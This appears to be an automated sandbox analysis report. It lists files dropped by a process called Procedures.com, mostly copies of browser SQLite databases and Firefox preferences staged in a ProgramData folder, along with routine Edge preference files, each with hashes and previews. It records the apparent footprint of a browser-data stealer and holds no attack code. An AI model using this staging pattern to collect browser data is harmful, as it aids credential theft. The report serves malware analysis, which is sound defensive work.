                                                                                                                                                                                                                                                                                                  C:\ProgramData\DJMYU3ECBA1N\IEUKNGLFC

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\ProgramData\DJMYU3ECBA1N\P8Q1VA

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\ProgramData\DJMYU3ECBA1N\UKNGDB

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9504
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                                  MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                                  SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                                  SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                                  SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\08893747-38cf-44ef-a489-5d8d01d61646.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090771906784153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+Mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEt6Ftbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8662E3B695594A271DF7E422F06CFFCD
                                                                                                                                                                                                                                                                                                  SHA1:9645442E464804A59743EB3146CD4FD9EDF47B46
                                                                                                                                                                                                                                                                                                  SHA-256:7738F0D38EEFBAB681858E003DB09B3283FE791F75F95C444C62AD1B2B26BB7F
                                                                                                                                                                                                                                                                                                  SHA-512:34CF2DF69B58F51C939FC2F22CCD141AE460147DE97D02AA4AE06D4BC6F528CA1A4D2A042A8AD61628A6B959B6E5EFE73CA658239F450657691EA478DDF8F369
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\132b97f2-cbb5-445c-8c33-8724d04bdee8.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):44600
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096219577018695
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB4wuzhDO6vP6O7xp+fu2lCFTkJv8UDPccGoup1XlI:z/Ps+wsI7ynEf6befGchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:60A20E62DA052BE31ECFCCE48FBD9FC6
                                                                                                                                                                                                                                                                                                  SHA1:1D911DD76A2D6A7DC3C892AE497F944518AA5006
                                                                                                                                                                                                                                                                                                  SHA-256:8AEB2A87780DA87EBC39CDC261F20F867485B722984FE643B2FB3A081CFD1EFF
                                                                                                                                                                                                                                                                                                  SHA-512:1E1471584DC9880071AF4DF8D30DCFEF73536DBEF1B29D479D44B3AE97C655BCD93716921B0D77BC0265E1D7892588325FA500CBF65EEE94000E3F0D4199DB9D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\24fbce43-b910-4baf-9323-7b4f4dc5800e.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):44608
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.09607807003545
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB4wuzhDO6vP6O7xp+fup3uAgLTF+E+LcGoup1Xl34:z/Ps+wsI7ynEf6bef4Lchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:0FB48A133A7989DF8A53E41475C3E056
                                                                                                                                                                                                                                                                                                  SHA1:9F4CF950FB9A3F3E401269370DA8F8E52129CB61
                                                                                                                                                                                                                                                                                                  SHA-256:22EEC30A2C6FB9F52430446F17D70EA4A93DAC8363E49BFD035E320A378CE0C3
                                                                                                                                                                                                                                                                                                  SHA-512:32116B1DB0778A89807804BBA99F676767816336FD67F32343CCFBA1A17E822B0651CC7351CBA6CAEE7574AC6CC8CB07E0C00BA0B8BDB706AC0DE4B8048C5559
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\468b2b39-f87c-402e-8880-4f46b95cb0b1.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):44616
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096143633957459
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB4wuzhDO6vP6O7xp+fGDlNkExDcGoup1Xl3jVzXr2:z/Ps+wsI7ynEf6befochu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:3CDF8A9BE299BDDAB55B679E9498D364
                                                                                                                                                                                                                                                                                                  SHA1:B6880DEAB1D667F5FBE730ABDAB52F7DCD5E442D
                                                                                                                                                                                                                                                                                                  SHA-256:F5988E36B9040F2490598CF4674C2DF8F4092155713D4D6D1AFD5FCB51E139C2
                                                                                                                                                                                                                                                                                                  SHA-512:7E2AC40766A11B2B0A3846C9E977A199DC960400EAE3A744BA5DA4CBD610F51436FD14B9ADD7A8D5A6EEDD67DE6C3A41E35E8A261F0C74D11D84792699950278
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5cccd903-6bc0-4374-9fc5-5694364a3c5d.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44608
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.09607807003545
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB4wuzhDO6vP6O7xp+fup3uAgLTF+E+LcGoup1Xl34:z/Ps+wsI7ynEf6bef4Lchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:0FB48A133A7989DF8A53E41475C3E056
                                                                                                                                                                                                                                                                                                  SHA1:9F4CF950FB9A3F3E401269370DA8F8E52129CB61
                                                                                                                                                                                                                                                                                                  SHA-256:22EEC30A2C6FB9F52430446F17D70EA4A93DAC8363E49BFD035E320A378CE0C3
                                                                                                                                                                                                                                                                                                  SHA-512:32116B1DB0778A89807804BBA99F676767816336FD67F32343CCFBA1A17E822B0651CC7351CBA6CAEE7574AC6CC8CB07E0C00BA0B8BDB706AC0DE4B8048C5559
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6c9b2287-21c5-4441-a1b0-b21d1200fb0a.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):45796
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.088237849050337
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:mMkbJrT8IeQc5d9R5oouAhDO6vP6O7xp+fiP3uFEFhGycfCAomGoup1Xl3jVzXrR:mMk1rT8H19R5o6befLFRomhu3VlXr4i
                                                                                                                                                                                                                                                                                                  MD5:A34A1142714AF772ECEA80F7F0CB1953
                                                                                                                                                                                                                                                                                                  SHA1:68125BDED91C77D1F6670928F77D02E98CE03AE4
                                                                                                                                                                                                                                                                                                  SHA-256:C5F748FF84148F7B76F5B9C3304AD8CEB0B26B320B7A360E076B0F0EC846A3F6
                                                                                                                                                                                                                                                                                                  SHA-512:AADF6CD509A0B7E650D11D22FBB9E7F22CAC05069D7B37658365151CFED02A897277DDCA6DC9B3D3D6BA0F149E5F406AC34B0F5CDC37F25B7BCD5D0008EC0FBB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6d5e679a-08e9-49a3-967a-800dc227d4c0.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44682
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.095738129899133
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkB6wuzhDO6vP6O7xp+fiP3uFEFhGcGoup1Xl3jVzXq:z/Ps+wsI7yOEV6befLchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:AB247005E807CB5B4AF851EC870729C4
                                                                                                                                                                                                                                                                                                  SHA1:9C97E63805B9B516E83B02B3FA48E56223B25F0E
                                                                                                                                                                                                                                                                                                  SHA-256:B265B8CD24589BC8E10467BBD29A49A02D46B499F4596A0EF8DA07BDA4D01C42
                                                                                                                                                                                                                                                                                                  SHA-512:4C4B1641A93B6363BCE893F477623834429F7F03E9324C53FD723883843B14D30E373F0F21E47F4D1E2BA0AEE1DE4FA3FB80525558086563A3803D447B82CF97
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\10844e20-c6e6-44bf-b3cc-0ece385333b2.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.640159935562401
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                                                                                                                                                  MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                                                                                                                                                  SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                                                                                                                                                  SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                                                                                                                                                  SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                                                                                                                                                  Malicious:false
